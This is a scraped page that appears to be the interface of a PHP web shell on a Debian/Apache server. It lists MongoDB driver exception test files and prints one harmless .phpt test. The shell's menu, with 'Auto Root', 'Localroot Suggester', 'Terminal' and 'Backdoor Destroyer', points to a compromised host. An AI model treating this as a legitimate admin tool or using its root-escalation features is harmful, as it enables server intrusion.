Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
tests /
mongodb /
tests /
exception /
Delete
Unzip
Name
Size
Permission
Date
Action
bulkwriteexception-getwriteresult-001.phpt
1.18
KB
-rw-r--r--
2025-04-09 02:56
bulkwriteexception-haserrorlabel-001.phpt
562
B
-rw-r--r--
2025-04-09 02:56
bulkwriteexception-haserrorlabel-002.phpt
1.19
KB
-rw-r--r--
2025-04-09 02:56
bulkwriteexception-haserrorlabel_error-001.phpt
531
B
-rw-r--r--
2025-04-09 02:56
commandexception-getresultdocument-001.phpt
548
B
-rw-r--r--
2025-04-09 02:56
commandexception-haserrorlabel-001.phpt
558
B
-rw-r--r--
2025-04-09 02:56
commandexception-haserrorlabel_error-001.phpt
527
B
-rw-r--r--
2025-04-09 02:56
exception-001.phpt
331
B
-rw-r--r--
2025-04-09 02:56
runtimeexception-haserrorlabel-001.phpt
558
B
-rw-r--r--
2025-04-09 02:56
runtimeexception-haserrorlabel_error-001.phpt
527
B
-rw-r--r--
2025-04-09 02:56
Save
Rename
--TEST-- MongoDB\Driver\Exception\BulkWriteException::hasErrorLabel() --FILE-- <?php $exception = new MongoDB\Driver\Exception\BulkWriteException(); $labels = ['test', 'foo']; $reflection = new ReflectionClass($exception); $resultDocumentProperty = $reflection->getProperty('errorLabels'); $resultDocumentProperty->setAccessible(true); $resultDocumentProperty->setValue($exception, $labels); var_dump($exception->hasErrorLabel('foo')); var_dump($exception->hasErrorLabel('bar')); ?> ===DONE=== <?php exit(0); ?> --EXPECT-- bool(true) bool(false) ===DONE===